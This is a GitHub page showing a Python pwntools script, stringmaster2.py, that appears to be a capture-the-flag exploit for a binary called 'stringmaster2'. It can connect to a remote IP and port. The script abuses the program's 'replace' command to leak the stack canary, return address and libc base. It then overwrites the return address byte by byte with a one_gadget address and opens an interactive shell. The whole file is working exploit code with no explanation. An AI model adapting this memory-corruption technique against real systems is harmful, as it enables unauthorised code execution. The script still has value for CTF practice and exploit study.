-
Notifications
You must be signed in to change notification settings - Fork 1
/
stringmaster2.py
51 lines (39 loc) · 1.24 KB
/
stringmaster2.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
#!/usr/bin/env python
from pwn import *
if (sys.argv[1] == "local"):
r = process("./stringmaster2")
else:
r = remote("35.207.132.47", 22225)
one_gadget_off = 0x10a38c
r.recvuntil("quit")
r.recvuntil("quit")
r.recvuntil("> ")
r.sendline("replace " + "\x00" + "A")
r.recvuntil("quit")
r.recvuntil("> ")
r.sendline("print")
r.recv(7*8)
canary = u64(r.recv(8))
log.info("canary: %s" % hex(canary))
r.recv(7*8)
ret = u64(r.recv(8))
log.info("ret: %s" % hex(ret))
r.recv(8)
base_libc = u64(r.recv(8)) - 0x21b97
log.info("base_libc: %s" % hex(base_libc))
one_gadget = base_libc + one_gadget_off
log.info("one_gadget: %s" % hex(one_gadget))
for i in range(6):
r.sendline("replace " + chr(ret >> 40) + chr(one_gadget >> 40))
for i in range(6):
r.sendline("replace " + chr((ret >> 32) & 0xff) + chr((one_gadget >> 32) & 0xff))
for i in range(4):
r.sendline("replace " + chr((ret >> 24) & 0xff)+ chr((one_gadget >> 24) & 0xff))
for i in range(4):
r.sendline("replace " + chr((ret >> 16) & 0xff)+ chr((one_gadget >> 16) & 0xff))
for i in range(1):
r.sendline("replace " + chr((ret >> 8) & 0xff)+ chr((one_gadget >> 8) & 0xff))
for i in range(1):
r.sendline("replace " + chr(ret & 0xff) + chr(one_gadget & 0xff))
r.sendline("quit")
r.interactive()